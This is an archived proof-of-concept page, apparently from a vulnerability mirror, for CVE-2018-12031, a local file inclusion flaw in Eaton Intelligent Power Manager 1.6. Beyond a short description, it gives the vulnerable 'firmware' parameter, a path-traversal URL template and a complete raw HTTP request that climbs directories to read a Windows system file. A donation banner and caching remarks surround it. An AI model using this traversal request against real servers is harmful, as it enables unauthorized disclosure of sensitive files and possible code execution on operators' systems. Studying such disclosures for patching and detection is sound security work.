Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2018-12031 PoC — Eaton Intelligent Power Manager 安全漏洞

Source
Associated Vulnerability
Title:Eaton Intelligent Power Manager 安全漏洞 (CVE-2018-12031)
Description:Eaton Intelligent Power Manager是美国Eaton公司的一款用于监控和管理屋里或虚拟环境电源的工具。 Eaton Intelligent Power Manager 1.6版本中存在安全漏洞。攻击者可借助'firmware'参数利用该漏洞包含文件。
Description
CVE-2018-12031 | LFI in Eaton Intelligent Power Manager  v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.
Readme
# Eaton-Intelligent-Power-Manager-Local-File-Inclusion
Local file inclusion in Eaton Intelligent Power Manager  v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution.

# CVE-2018-12031
To exploit vulnerability, someone could use 'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../' request to get some informations from the target.

```
GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host HTTP/1.1
Host: 192.168.45.138:4680
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
```


![alt tag](https://www.emreovunc.com/blog/en/eaton-power-manager-lfi.jpg)
File Snapshot

[4.0K] /data/pocs/63bc5969a6a7e5f83a4a7259f1fd71af82f63892 └── [1018] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.